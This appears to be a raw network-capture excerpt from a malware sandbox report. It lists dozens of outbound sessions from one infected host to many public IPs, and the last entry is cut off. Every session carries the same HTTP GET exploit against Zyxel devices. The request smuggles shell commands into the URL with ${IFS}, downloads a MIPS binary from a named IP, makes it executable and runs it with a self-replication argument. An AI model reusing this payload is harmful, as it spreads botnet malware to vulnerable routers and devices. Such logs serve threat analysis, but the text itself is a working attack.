                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1225192.168.2.1444122174.174.220.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152054071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1226192.168.2.144847683.114.102.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152085066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1227192.168.2.1454384166.1.16.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152134895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1228192.168.2.1444962194.171.15.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152173042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1229192.168.2.145573431.101.203.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152221918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1230192.168.2.1439674222.189.121.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152250051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1231192.168.2.144019449.244.82.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152292013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1232192.168.2.145776460.132.134.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152326107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1233192.168.2.1433254116.3.216.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152343035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1234192.168.2.1457918218.123.138.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152385950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1235192.168.2.1439676165.215.57.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152437925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1236192.168.2.1458320128.197.227.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152471066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1237192.168.2.1444684174.39.201.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152497053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1238192.168.2.143348089.46.39.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152554035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1239192.168.2.1459386172.95.51.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152587891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1240192.168.2.145009818.251.221.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152618885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1241192.168.2.144776648.42.17.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152654886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1242192.168.2.1447534152.198.127.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152693033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1243192.168.2.1449404107.11.8.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152741909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1244192.168.2.143585892.37.41.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152771950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1245192.168.2.1437078175.162.226.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152798891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1246192.168.2.1451362144.235.44.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152853966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1247192.168.2.144477889.87.237.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152895927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1248192.168.2.144075436.28.81.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152949095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1249192.168.2.1457974120.9.53.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152995110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1250192.168.2.145979898.129.39.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153027058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1251192.168.2.1440522132.102.12.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153068066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1252192.168.2.1445052122.132.185.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153120041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1253192.168.2.143280292.198.41.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153153896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1254192.168.2.145187223.80.69.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153207064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1255192.168.2.144237262.121.114.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153249979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1256192.168.2.1433944130.63.71.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153279066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1257192.168.2.145139869.65.28.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153312922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1258192.168.2.1436848149.43.163.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153345108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1259192.168.2.1449084155.6.82.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153414965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1260192.168.2.1433382145.71.223.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153449059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1261192.168.2.1453902172.194.245.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153496981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1262192.168.2.1455080161.124.116.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153522968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1263192.168.2.144897273.192.6.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153558016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1264192.168.2.1434994107.163.167.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153597116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1265192.168.2.1455764212.171.93.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153642893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1266192.168.2.143380068.36.238.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153687000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1267192.168.2.1436104121.222.62.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153706074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1268192.168.2.145558243.11.31.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153754950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1269192.168.2.1446032120.12.32.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153780937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1270192.168.2.1458932132.104.84.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153836012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1271192.168.2.14451421.192.250.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153870106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1272192.168.2.143904220.148.161.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153923988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1273192.168.2.1432886212.48.37.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153959036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1274192.168.2.1457494141.250.49.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.153985023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1275192.168.2.144416492.255.135.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154021978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1276192.168.2.1440714184.174.40.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154062033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1277192.168.2.1433962132.249.255.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154099941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1278192.168.2.144569445.140.250.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154165983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1279192.168.2.1437880183.189.144.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154201031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1280192.168.2.1444508186.70.228.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154239893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1281192.168.2.1458378144.132.51.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154288054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1282192.168.2.1448326152.1.248.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154319048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1283192.168.2.144741424.117.252.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154356003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1284192.168.2.1449462137.184.85.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154392958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1285192.168.2.1455406182.132.142.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154531002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1286192.168.2.1439902223.82.156.1443
                                                        TimestampBytes transferredDirectionData
